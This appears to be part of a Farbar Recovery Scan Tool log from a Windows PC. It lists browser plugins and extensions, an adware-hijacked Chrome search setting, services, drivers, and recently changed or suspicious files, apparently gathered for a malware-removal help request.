FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-04-13]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-09]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-13]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 MFE_RR; \??\C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-14 18:37 - 2016-04-14 18:37 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-10 19:08 - 2016-04-10 19:14 - 98655550 _____ C:\Users\RoNiN\Downloads\ECOMM - Brian Laney - Alert Technologies.pdf
2016-04-09 10:36 - 2016-04-09 10:36 - 00002547 _____ C:\Users\Public\Desktop\TurboTax 2015.lnk
2016-04-09 10:36 - 2016-04-09 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2015
2016-04-09 01:20 - 2016-04-09 01:22 - 00000000 ____D C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko)
2016-04-09 00:24 - 2016-04-09 00:31 - 39492246 _____ C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko).zip
2016-04-09 00:02 - 2016-04-09 00:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Weezer - Weezer (White Album)
2016-04-09 00:02 - 2016-04-09 00:12 - 00000000 ____D C:\Users\RoNiN\Downloads\A Tribe Called Quest - The Best Of
2016-04-08 23:28 - 2016-04-08 23:28 - 03119168 _____ C:\Users\RoNiN\Downloads\AdwCleaner.exe
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-14 18:38 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-09 16:19 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-05 13:10 - 2016-04-13 20:28 - 00000000 ____D C:\virus
2016-03-29 18:40 - 2016-03-29 18:40 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (10).ica
2016-03-29 18:29 - 2016-03-29 18:29 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (9).ica
2016-03-29 18:21 - 2016-03-29 18:21 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (8).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001380 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (5).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (7).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (6).ica
2016-03-29 18:12 - 2016-03-29 18:19 - 59554128 _____ (Citrix Systems, Inc.) C:\Users\RoNiN\Downloads\CitrixReceiver4.2.100 (1).exe
2016-03-29 18:11 - 2016-03-29 18:22 - 00734784 _____ (Oracle Corporation) C:\Users\RoNiN\Downloads\JavaSetup8u77.exe
2016-03-29 18:10 - 2016-03-29 18:10 - 02072960 _____ (Pulse Secure, LLC) C:\Users\RoNiN\Downloads\JuniperSetupClientInstaller.exe
2016-03-24 00:01 - 2016-03-24 00:01 - 04622232 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool (1).exe
2016-03-23 23:06 - 2016-04-11 19:17 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-23 23:06 - 2016-04-11 19:17 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-23 23:04 - 2016-03-23 23:05 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup (1).exe
2016-03-23 22:36 - 2016-03-23 22:45 - 04584344 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool.exe
2016-03-23 22:26 - 2016-03-23 22:26 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup.exe
2016-03-23 07:41 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\is-BFNHB.tmp
2016-03-22 23:30 - 2016-03-22 23:30 - 00000000 ____D C:\ProgramData\Emsisoft
2016-03-22 21:58 - 2016-04-09 18:44 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-03-22 21:04 - 2016-03-22 21:04 - 00000020 ___SH C:\Users\postgres\ntuser.ini
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\My Documents
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Videos
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Pictures
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Music
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Real
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Media Center Programs
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA Corporation
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\Google
2016-03-22 21:01 - 2016-04-12 20:45 - 00000000 ____D C:\Users\postgres
2016-03-22 08:01 - 2016-04-08 13:17 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-03-21 23:37 - 2016-03-29 12:30 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2016-03-21 23:03 - 2016-03-21 23:03 - 00001066 _____ C:\malwarebytes scan 2016-03-21.txt
2016-03-21 19:35 - 2016-03-21 19:35 - 00000046 _____ C:\Users\RoNiN\AppData\Roaming\WB.CFG
2016-03-21 19:12 - 2016-03-21 10:23 - 00886256 _____ (Microsoft Corporation) C:\Users\RoNiN\Desktop\mssstool64.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-14 18:38 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-14 18:36 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-04-14 18:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-04-14 18:35 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-14 18:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-14 18:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-14 18:03 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-14 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-13 20:35 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-13 20:23 - 2011-08-23 00:51 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Temp
2016-04-13 20:21 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-13 18:42 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-13 15:43 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-12 17:52 - 2015-10-03 08:42 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Packages
2016-04-09 18:40 - 2014-01-05 20:04 - 00000000 ____D C:\Users\RoNiN\Desktop\XBOX1
2016-04-09 16:28 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-09 14:33 - 2016-03-13 14:29 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-04-09 12:44 - 2010-10-17 10:09 - 00000000 ____D C:\Users\RoNiN\Documents\Text Documents
2016-04-09 11:12 - 2010-10-16 20:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Intuit
2016-04-09 10:39 - 2012-02-07 03:14 - 00001545 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-09 10:33 - 2011-02-15 01:43 - 00000000 ____D C:\Program Files (x86)\TurboTax
2016-04-09 01:22 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-04-09 00:04 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-04-08 15:53 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 13:45 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-03-29 18:38 - 2013-12-17 08:09 - 00000000 ____D C:\ProgramData\Oracle
2016-03-29 18:37 - 2015-03-13 11:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-03-29 18:37 - 2010-10-17 17:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-29 18:33 - 2015-09-29 09:12 - 00000000 ____D C:\Users\RoNiN\.oracle_jre_usage
2016-03-29 18:32 - 2015-03-13 11:04 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-25 15:28 - 2015-07-30 17:50 - 00000000 ____D C:\WINDOWS\Setup
2016-03-25 15:00 - 2016-03-11 19:33 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Company
2016-03-25 14:59 - 2015-07-12 09:18 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707123-0500-0006-000700080009
2016-03-25 14:59 - 2015-07-12 09:17 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707069-0500-0006-000700080009
2016-03-24 00:32 - 2013-07-11 06:09 - 00000000 ____D C:\Users\RoNiN\Update
2016-03-23 16:05 - 2016-03-11 19:27 - 00000000 ____D C:\ProgramData\DataFile
2016-03-22 23:42 - 2015-07-12 09:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436708320-0500-0006-000700080009
2016-03-22 20:01 - 2015-10-01 18:30 - 00003582 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 20:01 - 2015-10-01 18:30 - 00003518 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 01:44 - 2016-03-11 19:36 - 00000000 ____D C:\Users\RoNiN\AppData\Local\app
2016-03-21 20:44 - 2016-03-13 19:23 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Setup Wizard
2016-03-21 20:42 - 2015-09-27 14:51 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\foobar2000
2016-03-21 20:41 - 2015-09-27 14:49 - 03875496 _____ (foobar2000.org) C:\Users\RoNiN\Downloads\foobar2000_v1.3.8.exe
 
==================== Files in the root of some directories =======
 
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
